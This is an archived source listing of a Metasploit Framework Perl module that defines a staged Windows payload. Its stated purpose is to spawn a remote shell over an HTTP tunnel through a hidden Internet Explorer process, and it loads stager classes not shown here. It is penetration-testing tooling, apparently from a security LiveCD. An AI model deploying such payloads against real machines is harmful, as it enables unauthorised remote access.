home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / win32_passivex_stg.pm < prev    next >
Text File  |  2006-06-30  |  1KB  |  46 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::win32_passivex_stg;
  11.  
  12. use strict;
  13. use base 'Msf::PayloadComponent::Windows::ia32::PipedShellStage';
  14.  
  15. my $info =
  16. {
  17.     'Name'         => 'Windows Staged PassiveX Shell',
  18.     'Version'      => '$Revision: 1.1 $',
  19.     'Description'  => 'Spawn a shell via an HTTP tunnel through a hidden IEXPLORE.EXE',
  20.     'Multistage'   => 1,
  21.     'Authors'      => [ 'skape <mmiller [at] hick.org>', ],
  22. };
  23.  
  24. sub _Load 
  25. {
  26.     Msf::PayloadComponent::Windows::ia32::PipedShellStage->_Import('Msf::PayloadComponent::Windows::ia32::PassiveXStager');
  27.  
  28.     __PACKAGE__->SUPER::_Load();
  29. }
  30.  
  31. sub new 
  32. {
  33.     my $class = shift;
  34.     my $hash = @_ ? shift : { };
  35.     my $self;
  36.  
  37.     _Load();
  38.  
  39.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  40.     $self = $class->SUPER::new($hash, @_);
  41.  
  42.     return($self);
  43. }
  44.  
  45. 1;
  46.